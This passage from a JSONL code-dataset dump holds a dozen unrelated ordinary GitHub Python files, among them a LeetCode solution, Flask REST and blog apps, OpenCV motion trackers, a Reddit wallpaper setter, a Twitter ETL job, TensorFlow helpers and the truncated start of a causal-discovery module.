0:\n\t\t\t\tsave_model(str(iter_num))\n\t\t\t\n\t\t\tif iter_num % self.args.save_latest == 0:\n\t\t\t\tsave_model(\"latest\")\n\t\t\t\n\t\t\tif iter_num >= self.args.epochs:\n\t\t\t\tbreak\n\t\treturn logs\n\t\t","repo_name":"chentong1023/Two-stage-VAE-pytorch","sub_path":"FactorTrainer.py","file_name":"FactorTrainer.py","file_ext":"py","file_size_in_byte":5972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21777054796","text":"\n\n# Given a 2D binary matrix filled with 0's and 1's,\n# find the largest rectangle containing all ones and return its area.\n\n# http://www.cnblogs.com/lichen782/p/leetcode_maximal_rectangle.html\n\nclass Solution(object):\n def maximalRectangle(self, matrix):\n \"\"\"\n :type matrix: List[List[str]]\n :rtype: int\n \"\"\"\n\n if matrix == []:\n return 0\n\n heights = [0 for i in range(len(matrix[0]))]\n maxArea = 0\n\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n heights[j] = heights[j] + 1 if matrix[i][j] == '1' else 0\n maxArea = max(maxArea, self.largestArea(heights))\n\n return maxArea\n\n\n def largestArea(self, heights):\n stack = []\n i = 0\n maxArea = 0\n h = heights + [0]\n\n while i < len(h):\n if (not stack) or h[stack[-1]] <= h[i]:\n stack.append(i)\n i += 1\n else:\n tmp = stack.pop()\n maxArea = max(maxArea, h[tmp] * (i if not stack 
else i - stack[-1] - 1))\n\n return maxArea\n\n\n\n\n\n\n\n","repo_name":"creageng/lc2016","sub_path":"85_Maximal_Rectangle.py","file_name":"85_Maximal_Rectangle.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16953661672","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Unit tests for loag_analyzer.py\"\"\"\n\nimport unittest\nimport pycodestyle\nimport log_analyzer as la\n\n\nclass TestCode(unittest.TestCase):\n \"\"\"TestCode\"\"\"\n\n def test_conformance(self):\n \"\"\"Test that we conform to PEP-8.\"\"\"\n style = pycodestyle.StyleGuide(quiet=True, config_file='tox.ini')\n result = style.check_files([la.__file__])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors (and warnings).\")\n\n def test_app(self):\n \"\"\"Test App\"\"\"\n d = {'App': {'TEST': 'pass'}}\n save_path = \"tests/save_config.ini\"\n la.App.save_config(save_path, d)\n r = la.App.load_config(save_path)\n self.assertTrue(len(d) == len(r) == len(list(k for k in d if k in r and d[k] == r[k])), \"Saved dict is not the same as loaded.\")\n\n\nclass TestMainCode(unittest.TestCase):\n \"\"\"Test main\"\"\"\n\n def test_main(self):\n \"\"\"Test main\"\"\"\n la.App.init(\"tests/log_test.ini\")\n self.assertTrue(la.main(la.App) >= 0, \"Main functionality is failed.\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nj-eka/LogAnalyzer","sub_path":"test_log_analyzer.py","file_name":"test_log_analyzer.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73330723341","text":"import praw\nimport subprocess\nimport os\n\n# Creating the reddit object\nreddit = praw.Reddit(\"BackgroundFromReddit\")\nfile_extension = ['jpg', 'png'] # For now, we only want these two extensions\nsubreddit_name = \"EarthPorn\" # The name of the subreddit we want\n\n# We are only interested in the top url whih contains an easy to extract image\n# So we only keep the first submission whose extension is correct\nfor submission in reddit.subreddit(subreddit_name).top(time_filter=\"day\"):\n url = submission.url\n if url.split(\".\")[-1] in file_extension:\n print(url)\n break\n\n# Configuring so that the image is centered\n# then setting the background image\nbg_centred = \"gsettings set org.gnome.desktop.background picture-options scaled\"\nset_bg = f\"gsettings set org.gnome.desktop.background picture-uri {url}\"\n\nsubprocess.run(bg_centred.split(), stdout=subprocess.PIPE)\nsubprocess.run(set_bg.split(), stdout=subprocess.PIPE)\n\n# Saving the files\nhome_dir = os.getenv(\"HOME\")\nsubprocess.run(f\"mkdir -p {home_dir}/Pictures/Backgrounds\".split(),\n stdout=subprocess.PIPE)\nsubprocess.run(f\"wget {url}\".split(),\n stdout=subprocess.PIPE,\n cwd=f\"{home_dir}/Pictures/Backgrounds\")\n","repo_name":"AlperenAydin/BackgroundFromReddit","sub_path":"BackgroundFromReddit.py","file_name":"BackgroundFromReddit.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73693987022","text":"from __future__ import print_function \nimport cv2 \nimport numpy as np \n\ndef main():\n cap = cv2.VideoCapture(0)\n back_sub = cv2.createBackgroundSubtractorMOG2(history=700,varThreshold=25, detectShadows=True)\n kernel = np.ones((20, 20), np.uint8)\n while (True):\n ret, frame = cap.read()\n fg_mask = 
back_sub.apply(frame)\n # Close dark gaps in foreground object using closing\n fg_mask = cv2.morphologyEx(fg_mask, cv2.MORPH_CLOSE, kernel)\n # Remove salt and pepper noise with a median filter\n fg_mask = cv2.medianBlur(fg_mask, 5)\n # Threshold the image to make it either black or white\n _, fg_mask = cv2.threshold(fg_mask, 127, 255, cv2.THRESH_BINARY)\n # Find the index of the largest contour and draw bounding box\n fg_mask_bb = fg_mask\n contours, hierarchy = cv2.findContours(fg_mask_bb, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[-2:]\n areas = [cv2.contourArea(c) for c in contours]\n # If there are no countours\n if len(areas) < 1:\n # Display the resulting frame\n cv2.imshow('view', frame)\n # If \"q\" is pressed on the keyboard, \n # exit this loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n # Go to the top of the while loop\n continue\n else:\n # Find the largest moving object in the image\n max_index = np.argmax(areas)\n # Draw the bounding box\n cnt = contours[max_index]\n x, y, w, h = cv2.boundingRect(cnt)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)\n # Draw circle in the center of the bounding box\n x2 = x + int(w / 2)\n y2 = y + int(h / 2)\n cv2.circle(frame, (x2, y2), 4, (0, 255, 0), -1)\n # Print the centroid coordinates (we'll use the center of the\n # bounding box) on the image\n text = \"x: \" + str(x2) + \", y: \" + str(y2)\n cv2.putText(frame, text, (x2 - 10, y2 - 10),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n # Display the resulting frame\n cv2.imshow('view', frame)\n # If \"q\" is pressed on the keyboard, \n # exit this loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n # Close down the video stream\n cap.release()\n cv2.destroyAllWindows()\nif __name__ == '__main__':\n print(__doc__)\n main()","repo_name":"HandreGiarman/Object_Detection_Move_Sample","sub_path":"Object_Detection_Move_Sample.py","file_name":"Object_Detection_Move_Sample.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3066845882","text":"cnt=0\nlst= [2,5,13]\nwhile True:\n\tif cnt >1000:\n\t\tbreak\n\tGubo = lst[-1]+lst[-1] + lst[-2] + lst[-3]\n\tlst.append(Gubo)\n\tcnt+=1\nwhile True:\n\ttry:\n\t\ta=int(input())\n\t\tprint(lst[a-1])\n\texcept:\n\t\tbreak","repo_name":"SoleMin/Algorithmic_Problems","sub_path":"110603/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73757991822","text":"import os\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom auth import AuthError, requires_auth\nfrom models import Movie, Actor, setup_db\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n setup_db(app)\n CORS(app)\n\n # API Endpoints\n @app.route('/movies', methods=['GET'])\n @requires_auth('get:movies')\n def get_movies(payload):\n '''\n GET /movies\n\n returns status code 200 and json \n {\"success\": True, \"movies\": movies} \n where movies is the list of movies\n OR appropriate status code indicating reason for failure\n '''\n movies = Movie.query.order_by(Movie.id).all()\n\n if len(movies) == 0:\n abort(404)\n\n return jsonify({\n 'success': True,\n 'movies': [movie.format() for movie in movies]\n })\n\n @app.route('/movies', methods=['POST'])\n @requires_auth('post:movies')\n def post_movies(payload):\n '''\n POST /movies\n\n 
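expects a JSON body with 'title' and 'release_date' fields\n\n    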
returns status code 200 and json {\"success\": True, \"created\": id}\n        where id is the id of the created movie\n        OR appropriate status code indicating reason for failure\n        '''\n        data = request.get_json()\n\n        if not data:\n            abort(400)\n\n        title = data.get('title', None)\n        release_date = data.get('release_date', None)\n\n        if None in [title, release_date]:\n            abort(422)\n\n        try:\n            new_movie = Movie(\n                title=title,\n                release_date=release_date\n            )\n            new_movie.insert()\n\n        except:\n            Movie.rollback()\n            abort(422)\n\n        return jsonify({\n            'success': True,\n            'created': new_movie.id\n        })\n\n    @app.route('/movies/<int:id>', methods=['PATCH'])\n    @requires_auth('patch:movies')\n    def patch_movies(payload, id):\n        '''\n        PATCH /movies\n\n        returns status code 200 and json {\"success\": True, \"movie\": movie}\n        where movie is the movie's modified attributes\n        OR appropriate status code indicating reason for failure\n        '''\n        movie = Movie.query.get_or_404(id)\n\n        data = request.get_json()\n\n        if not data:\n            abort(400)\n\n        title = data.get('title', None)\n        release_date = data.get('release_date', None)\n\n        try:\n            if title:\n                movie.title = title\n            if release_date:\n                movie.release_date = release_date\n            movie.update()\n\n        except:\n            Movie.rollback()\n            abort(422)\n\n        return jsonify({\n            'success': True,\n            'movie': [movie.format()]\n        })\n\n    @app.route('/movies/<int:id>', methods=['DELETE'])\n    @requires_auth('delete:movies')\n    def delete_movie(payload, id):\n        '''\n        DELETE /movies\n\n        returns status code 200 and json {\"success\": True, \"deleted\": id}\n        where id is the id of the deleted movie\n        OR appropriate status code indicating reason for failure\n        '''\n\n        movie = Movie.query.get_or_404(id)\n\n        try:\n            movie.delete()\n\n        except:\n            Movie.rollback()\n            abort(422)\n\n        return jsonify({\n            'success': True,\n            'deleted': movie.id\n        })\n\n    @app.route('/actors', methods=['GET'])\n    @requires_auth('get:actors')\n    def get_actors(payload):\n        '''\n        GET /actors\n\n        returns status code 200 and json \n        {\"success\": True, \"actors\": actors} \n        where actors is the list of actors\n        OR appropriate status code indicating reason for failure\n        '''\n        actors = Actor.query.order_by(Actor.id).all()\n\n        if len(actors) == 0:\n            abort(404)\n\n        return jsonify({\n            'success': True,\n            'actors': [actor.format() for actor in actors]\n        })\n\n    @app.route('/actors', methods=['POST'])\n    @requires_auth('post:actors')\n    def post_actors(payload):\n        '''\n        POST /actors\n\n        returns status code 200 and json {\"success\": True, \"created\": id}\n        where id is the id of the created actor\n        OR appropriate status code indicating reason for failure\n        '''\n        data = request.get_json()\n\n        if not data:\n            abort(400)\n\n        name = data.get('name', None)\n        age = data.get('age', None)\n        gender = data.get('gender', None)\n\n        if None in [name, age, gender]:\n            abort(422)\n\n        try:\n            new_actor = Actor(\n                name=name,\n                age=age,\n                gender=gender\n            )\n            new_actor.insert()\n\n        except:\n            Actor.rollback()\n            abort(422)\n\n        return jsonify({\n            'success': True,\n            'created': new_actor.id\n        })\n\n    @app.route('/actors/<int:id>', methods=['PATCH'])\n    @requires_auth('patch:actors')\n    def patch_actors(payload, id):\n        '''\n        PATCH /actors\n\n        returns status code 200 and json {\"success\": True, \"actor\": actor}\n        where actor is the actor's modified attributes\n        OR appropriate status code indicating reason for failure\n        '''\n        actor = Actor.query.get_or_404(id)\n\n        data = request.get_json()\n\n        if not data:\n            abort(400)\n\n        name = data.get('name', None)\n        age = data.get('age', None)\n        gender = data.get('gender', None)\n\n        try:\n            if name:\n                
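# update only the fields supplied in the request\n                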
actor.name = name\n            if age:\n                actor.age = age\n            if gender:\n                actor.gender = gender\n            actor.update()\n\n        except:\n            Actor.rollback()\n            abort(422)\n\n        return jsonify({\n            'success': True,\n            'actor': [actor.format()]\n        })\n\n    @app.route('/actors/<int:id>', methods=['DELETE'])\n    @requires_auth('delete:actors')\n    def delete_actor(payload, id):\n        '''\n        DELETE /actors\n\n        returns status code 200 and json {\"success\": True, \"deleted\": id}\n        where id is the id of the deleted actor\n        OR appropriate status code indicating reason for failure\n        '''\n        actor = Actor.query.get_or_404(id)\n\n        try:\n            actor.delete()\n\n        except:\n            Actor.rollback()\n            abort(422)\n\n        return jsonify({\n            'success': True,\n            'deleted': actor.id\n        })\n\n    # Error Handling\n\n    @app.errorhandler(400)\n    def bad_request(error):\n        return jsonify({\n            \"success\": False,\n            \"error\": 400,\n            \"message\": \"bad request\"\n        }), 400\n\n    @app.errorhandler(404)\n    def not_found(error):\n        return jsonify({\n            'success': False,\n            'error': 404,\n            'message': 'resource not found'\n        }), 404\n\n    @app.errorhandler(422)\n    def unprocessable(error):\n        return jsonify({\n            \"success\": False,\n            \"error\": 422,\n            \"message\": \"unprocessable\"\n        }), 422\n\n    @app.errorhandler(AuthError)\n    def authentication_error(error):\n        if 'description' in error.error:\n            message = error.error['description']\n        else:\n            message = 'authentication error'\n        return jsonify({\n            'success': False,\n            'error': error.status_code,\n            'message': message\n        }), error.status_code\n\n    return app\n\n\napp = create_app()\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=8080, debug=True)\n","repo_name":"GaBrandao/full-stack-nanodegree","sub_path":"capstone/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"27108443811","text":"import os\nimport json\nimport tweepy\nfrom datetime import datetime\nfrom dotenv import load_dotenv\nload_dotenv()\n\nimport pandas as pd\n\n\ndef run_etl():\n\n    bearer = os.environ.get('BEARER')\n\n\n    client = tweepy.Client(bearer_token=bearer)\n    query = 'harcelement OR violence -is:retweet'\n\n    tweets = client.search_recent_tweets(query=query,\n                                        expansions=['author_id'],\n                                        tweet_fields=['created_at', 'lang'],\n                                        max_results=100)\n\n    tweet_list = []\n    users = {u['id']:u for u in tweets.includes['users']}\n\n    for tweet in tweets.data:\n        if users[tweet.author_id]:\n            user = users[tweet.author_id]\n            text = tweet['text']\n\n            refined_tweet = {\"user_id\":user['id'],\n                            \"user_name\":user['name'],\n                            \"text\":text}\n\n            tweet_list.append(refined_tweet)\n\n    df = pd.DataFrame(tweet_list)\n    df.to_csv(\"s3://airflow-omdena/harcelement.csv\")\n\n","repo_name":"HemanthSai7/Twitter_ETL_pipeline","sub_path":"twitter_etl.py","file_name":"twitter_etl.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"39507815892","text":"import os\nimport re\nimport math\nimport json\nimport yaml\nimport tensorflow.keras as keras\n\n\n#\n# I/O\n#\ndef read_yaml(path,*key_path):\n    \"\"\" read yaml file\n    path: path to yaml file\n    *key_path: keys to go to in object\n    \"\"\" \n    with open(path,'rb') as file:\n        obj=yaml.safe_load(file)\n    for k in key_path:\n        obj=obj[k]\n    return obj\n\n\ndef read_json(path,*key_path):\n    \"\"\" read json file\n    path: path to json file\n    *key_path: keys to go to in object\n    \"\"\" \n    with open(path,'rb') as file:\n        obj=json.load(file)\n    for k in key_path:\n        obj=obj[k]\n    
return obj\n\n\n#\n# PYTHON\n#\n_SNAKE_RGX=re.compile('((?<=[a-z0-9])[A-Z]|(?!^)[A-Z](?=[a-z]))')\ndef snake(string):\n return _SNAKE_RGX.sub(r'_\\1',str(string)).lower()\n\n\ndef camel(string):\n return re.sub('[\\ \\-\\_]','',str(string).title())\n\n\ndef falsey(value):\n if isinstance(value,str):\n value=value.lower()!='false'\n return value is False\n\n\ndef truey(value):\n if isinstance(value,str):\n value=value.lower()=='true'\n return value is True\n\n\ndef noney(value):\n if isinstance(value,str) and value.lower()=='none':\n value=None\n return value is None\n\n\n#\n# UTILS\n#\nclass StrideManager(object):\n\n\n def __init__(self,output_stride,keep_mid_step=False,keep_indices=True):\n self.output_stride=output_stride\n self.strided_steps=round(math.log2(output_stride))\n self._set_keepers(keep_mid_step,keep_indices)\n self.reset()\n\n\n def step(self,strides=True):\n if strides is True:\n strides=2\n if (strides>1):\n self.stride_index+=1\n new_output_stride=self.current_output_stride*strides\n if new_output_stride>=self.output_stride:\n self.at_max_stride=True\n self.dilation_index+=1\n self.dilation_rate*=strides\n self.stride_state=1\n self.keep_index=False\n else:\n self.current_output_stride=new_output_stride\n self.keep_index=self._keep_index()\n\n\n def strides(self,strides=None):\n if self.at_max_stride:\n return 1\n else:\n if (strides is None) or (strides is True):\n strides=2\n elif strides is False:\n strides=1\n return strides\n\n\n def reset(self):\n self.stride_index=0\n self.dilation_index=0\n self.dilation_rate=1\n self.stride_state=2\n self.current_output_stride=1\n self.at_max_stride=False\n self.keep_index=self._keep_index()\n\n\n def _keep_index(self):\n if isinstance(self.keep_indices,list):\n return self.stride_index in self.keep_indices\n else:\n return self.keep_indices\n\n\n def _set_keepers(self,keep_mid_step,keep_indices):\n if keep_mid_step:\n self.keep_indices=[keep_mid_step]\n else:\n self.keep_indices=keep_indices\n if self.keep_indices is True:\n self.nb_keepers=self.strided_steps\n elif self.keep_indices:\n self.nb_keepers=len(self.keep_indices)\n else:\n self.nb_keepers=0\n\n\n#\n# FINE TUNING\n#\ndef swap_top(model,top,inputs=None,inputs_shape=None,swap_index=-2,noisy=True):\n if inputs is None:\n if inputs_shape is None:\n inputs=model.inputs\n else:\n inputs=keras.Input(shape=inputs_shape)\n model.trainable=False\n if swap_index:\n if noisy:\n print('SWAP TOP AFTER:',model.layers[swap_index].name)\n model=keras.Model(model.inputs, model.layers[swap_index].output)\n return keras.Model(inputs,top(model(inputs,training=False)))\n\n\n\ndef match_layer(\n name=None,\n index=None,\n matches=[],\n indices=[],\n searches=[],\n excludes=[]):\n match=False\n if name:\n if name in matches:\n match=True\n else:\n found=next((s for s in searches if s in name),False)\n if found:\n exclude=next((e for e in excludes if e in name),False)\n if not exclude:\n match=True\n if index and indices:\n match=index in indices\n return match\n \n\ndef set_trainable(\n model,\n matches=[],\n indices=[],\n searches=[],\n excludes=[],\n trainable=True,\n return_matched=False,\n noisy=False):\n if matches or indices or searches:\n matches=_as_list(matches)\n indices=_as_list(indices)\n searches=_as_list(searches)\n excludes=_as_list(excludes)\n indices=[int(i) for i in indices]\n if return_matched:\n matched=[]\n for i,l in enumerate(model.layers):\n match=match_layer(\n name=l.name,\n index=i,\n matches=matches,\n indices=indices,\n searches=searches,\n excludes=excludes)\n 
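# matched layers get the requested trainable flag; all other layers get its opposite\n            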
l.trainable=bool(trainable==match)\n            if return_matched and match:\n                matched.append(l)\n            if noisy and match:\n                print(l.name,l.trainable)\n        if return_matched:\n            return matched\n\n\n#\n# CONSTANTS\n#\nCOLORS=[\n    '#8dd3c7',\n    '#ffffb3',\n    '#bebada',\n    '#fb8072',\n    '#80b1d3',\n    '#fdb462',\n    '#b3de69',\n    '#fccde5',\n    '#d9d9d9',\n    '#bc80bd',\n    '#ccebc5',\n    '#ffed6f',\n    '#e41a1c',\n    '#377eb8',\n    '#4daf4a',\n    '#984ea3',\n    '#ff7f00',\n    '#ffff33',\n    '#a65628',\n    '#f781bf',\n    '#999999',\n    '#66c2a5',\n    '#fc8d62',\n    '#8da0cb',\n    '#e78ac3',\n    '#a6d854',\n    '#ffd92f',\n    '#e5c494',\n    '#b3b3b3'\n]\n\n#\n# INTERNAL\n#\ndef _as_list(value):\n    if value in [None,False]:\n        value=[]\n    elif not isinstance(value,list):\n        value=[value]\n    return value\n\n\n\n\n\n\n\n\n\n\n","repo_name":"brookisme/tfbox","sub_path":"tfbox/utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"1318690345","text":"import numpy as np\nimport cv2 as cv\n\nclass TrackObject():\n    def __init__(self, image):\n        super().__init__()\n        self.x = 0\n        self.y = 0\n        self.w = 0\n        self.h = 0 \n        self.image = image\n\n\n    def get_shape(self):\n        return self.image.shape\n\n\n    def track(self):\n        copy_image = self.image.copy()\n\n        hsv_image = cv.cvtColor(self.image, cv.COLOR_BGR2HSV)\n        lowerlimit = np.array([29, 86, 100])\n        upperlimit = np.array([64, 255, 255])\n\n        mask = cv.inRange(hsv_image, lowerlimit, upperlimit)\n        mask = cv.erode(mask, None, iterations=2) \n        mask = cv.dilate(mask, None, iterations=2)\n\n        contours, hierarchy = cv.findContours(mask, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\n        if len(contours) != 0:\n            cv.drawContours(copy_image, contours, -1, 255, 3)\n            max_contor = max(contours, key=cv.contourArea)\n            self.x, self.y, self.w, self.h = cv.boundingRect(max_contor)\n            return(self.x, self.y, self.w, self.h)\n        else:\n            return \"Human out of range!!\"","repo_name":"Nabin-Flash320/Cart-UI","sub_path":"TrackObject.py","file_name":"TrackObject.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"70348675342","text":"#\n# -*- coding: utf-8 -*-\n#\n# @Author: Arrack\n# @Date:   2020-05-25 18:22:18\n# @Last modified by:   Arrack\n# @Last Modified time: 2020-06-10 15:47:49\n#\n\nfrom flask import Blueprint\nfrom flask import current_app\nfrom flask import flash\nfrom flask import redirect\nfrom flask import request\nfrom flask import render_template\nfrom flask import url_for\n\nfrom app.extensions import db\nfrom app.forms import TalkForm\nfrom app.models import Article\nfrom app.models import Category\nfrom app.models import Tag\nfrom app.models import Talk\nfrom app.viewmodels import TalkViewModel, TalksViewModel\n\n\nbp = Blueprint('main', __name__)\n\n\n@bp.route('/')\ndef index():\n    page = request.args.get('page', 1, type=int)\n    pagination = Article.query.order_by(Article.createTime.desc()).paginate(\n        page, per_page=current_app.config['ARTICLES_PER_PAGE'])\n    return render_template('main/index.html', pagination=pagination)\n\n\n@bp.route('/article/<int:aid>')\ndef article(aid):\n    post = Article.query.get(aid)\n    tags = [item.tag.name for item in post.tags]\n    return render_template('main/article.html', article=post, tags=tags)\n\n\n@bp.route('/category/<name>')\ndef category(name):\n    cate = Category.query.filter_by(name=name).first()\n    return render_template('main/category.html', category=cate)\n\n\n@bp.route('/tag/<name>')\ndef 
tag(name):\n    tag = Tag.query.filter_by(name=name).first()\n    articles = [item.article for item in tag.articles]\n    return render_template('main/tag.html', tag=tag, articles=articles)\n\n\n@bp.route('/talktalk', methods=['GET', 'POST'])\ndef talks():\n    form = TalkForm(request.form)\n\n    if request.method == 'POST' and form.validate():\n        content = form.content.data\n        try:\n            t = Talk(content=content)\n            db.session.add(t)\n            db.session.commit()\n        except Exception as e:\n            db.session.rollback()\n            flash(str(e), category='error')\n        else:\n            flash('Chatterbox, got that much free time?')\n        return redirect(url_for('main.talks'))\n\n    page = request.args.get('page', 1, type=int)\n    pagination = Talk.query.order_by(Talk.createTime.desc()).paginate(\n        page, per_page=current_app.config['TALKS_PER_PAGE'])\n    talks = [TalkViewModel(t) for t in pagination.items]\n    talks = TalksViewModel(talks)\n    return render_template('main/talks.html', form=form, talks=talks, pagination=pagination)\n\n\n@bp.route('/about')\ndef about():\n    return render_template('main/about.html')\n\n\n# @bp.route('/article/<year>/<month>/<title>')\n# def article(year, month, title):\n#     url = join('/article', year, month, title)\n#     article = Article.query.filter_by(url=url).first()\n#     article_body = markdown_to_html(article.body)\n#     return render_template(\n#         'blog/article.html', article=article, article_body=article_body)\n\n\n# @bp.route('/category/<category>')\n# def category(category):\n#     articles = Category.query.filter_by(name=category).first().articles.order_by(Article.id.desc())\n#     return render_template(\n#         'blog/category.html', category=category, articles=articles)\n\n\n# @bp.route('/tag/<tag>')\n# def tag(tag):\n#     articles = Tag.query.filter_by(name=tag).first().articles.order_by(Article.id.desc())\n#     return render_template(\n#         'blog/tag.html', tag=tag, articles=articles)\n\n\n# @bp.route('/talktalk', methods=['GET', 'POST'])\n# def talktalk():\n#     form = TalkForm()\n#     if form.validate_on_submit():\n#         talk = Talk(\n#             content=form.content.data,\n#             private=form.private.data)\n#         db.session.add(talk)\n#         db.session.commit()\n#         flash('If you can argue it out, try not to get physical.')\n#         return redirect(url_for('blog.talktalk'))\n\n#     first_id = Top.query.filter_by(type='talk').first().foreign_id\n#     first = Talk.query.get(first_id).first()\n\n#     # TODO private, auth, flash, style\n#     talks = Talk.query.filter(Talk.id != first_id).order_by(Talk.id.desc()).all()\n#     return render_template('blog/talktalk.html', first=first, talks=talks, form=form)\n","repo_name":"cqkenuo/Maybe","sub_path":"app/views/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"74428011023","text":"import os\nimport numpy as np\nimport torch as th\nimport pandas as pd\nimport networkx as nx\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import scale\nfrom .model import GraphModel\nfrom ...utils.parallel import parallel_run\nfrom ...utils.loss import notears_constr\nfrom ...utils.torch import ChannelBatchNorm1d, MatrixSampler, Linear3D\nfrom ...utils.Settings import SETTINGS\n\n\nclass SAM_generators(th.nn.Module):\n    \"\"\"Ensemble of all the SAM generators.\n\n    Args:\n        data_shape (tuple): Shape of the true data\n        nh (int): Initial number of hidden units in the hidden layers\n        skeleton (numpy.ndarray): Initial skeleton, defaults to a fully connected graph\n        linear (bool): Enables the linear variant\n    \"\"\"\n\n    def __init__(self, data_shape, nh, skeleton=None, linear=False):\n        \"\"\"Init 
the model.\"\"\"\n super(SAM_generators, self).__init__()\n layers = []\n # Building skeleton\n self.linear = linear\n nb_vars = data_shape[1]\n self.nb_vars = nb_vars\n if skeleton is None:\n skeleton = 1 - th.eye(nb_vars + 1, nb_vars) # 1 row for noise\n else:\n skeleton = th.cat([th.Tensor(skeleton), th.ones(1, nb_vars)], 1)\n if linear:\n self.input_layer = Linear3D((nb_vars, nb_vars + 1, 1))\n else:\n self.input_layer = Linear3D((nb_vars, nb_vars + 1, nh))\n layers.append(ChannelBatchNorm1d(nb_vars, nh))\n layers.append(th.nn.Tanh())\n self.output_layer = Linear3D((nb_vars, nh, 1))\n\n self.layers = th.nn.Sequential(*layers)\n self.register_buffer('skeleton', skeleton)\n\n def forward(self, data, noise, adj_matrix, drawn_neurons=None):\n \"\"\"Forward through all the generators.\n\n Args:\n data (torch.Tensor): True data\n noise (torch.Tensor): Samples of noise variables\n adj_matrix (torch.Tensor): Sampled adjacency matrix\n drawn_neurons (torch.Tensor): Sampled matrix of active neurons\n\n Returns:\n torch.Tensor: Batch of generated data\n \"\"\"\n\n if self.linear:\n output = self.input_layer(data, noise, adj_matrix * self.skeleton)\n else:\n output = self.output_layer(self.layers(self.input_layer(data,\n noise,\n adj_matrix * self.skeleton)),\n drawn_neurons)\n\n return output.squeeze(2)\n\n def reset_parameters(self):\n if not self.linear:\n self.output_layer.reset_parameters()\n for layer in self.layers:\n if hasattr(layer, 'reset_parameters'):\n layer.reset_parameters()\n self.input_layer.reset_parameters()\n\n\nclass SAM_discriminator(th.nn.Module):\n \"\"\"SAM discriminator.\n\n Args:\n nfeatures (int): Number of variables in the dataset\n dnh (int): Number of hidden units in the hidden layers\n hlayers (int): Number of hidden layers\n mask (numpy.ndarray): Mask of connections to ignore\n \"\"\"\n\n def __init__(self, nfeatures, dnh, hlayers=2, mask=None):\n super(SAM_discriminator, self).__init__()\n self.nfeatures = nfeatures\n layers = []\n layers.append(th.nn.Linear(nfeatures, dnh))\n layers.append(th.nn.BatchNorm1d(dnh))\n layers.append(th.nn.LeakyReLU(.2))\n for i in range(hlayers-1):\n layers.append(th.nn.Linear(dnh, dnh))\n layers.append(th.nn.BatchNorm1d(dnh))\n layers.append(th.nn.LeakyReLU(.2))\n\n layers.append(th.nn.Linear(dnh, 1))\n self.layers = th.nn.Sequential(*layers)\n\n if mask is None:\n mask = th.eye(nfeatures, nfeatures)\n self.register_buffer(\"mask\", mask.unsqueeze(0))\n\n def forward(self, input, obs_data=None):\n \"\"\"Forward pass in the discriminator.\n\n Args:\n input (torch.Tensor): True Data or generated data\n obs_data (torch.Tensor): True data in the case of `input=generated` for padding.\n\n Returns:\n torch.Tensor: Output of the discriminator\n \"\"\"\n if obs_data is not None:\n return [self.layers(i) for i in th.unbind(obs_data.unsqueeze(1) * (1 - self.mask)\n + input.unsqueeze(1) * self.mask, 1)]\n else:\n return self.layers(input)\n\n def reset_parameters(self):\n for layer in self.layers:\n if hasattr(layer, 'reset_parameters'):\n layer.reset_parameters()\n\n\ndef run_SAM(in_data, skeleton=None, device=\"cpu\",\n train=5000, test=1000,\n batch_size=-1, lr_gen=.001,\n lr_disc=.01, lambda1=0.001, lambda2=0.0000001, nh=None, dnh=None,\n verbose=True, losstype=\"fgan\",\n dagstart=0, dagloss=False,\n dagpenalization=0.05, dagpenalization_increase=0.0,\n linear=False, hlayers=2, idx=0):\n\n list_nodes = list(in_data.columns)\n data = scale(in_data[list_nodes].values)\n nb_var = len(list_nodes)\n data = data.astype('float32')\n data = 
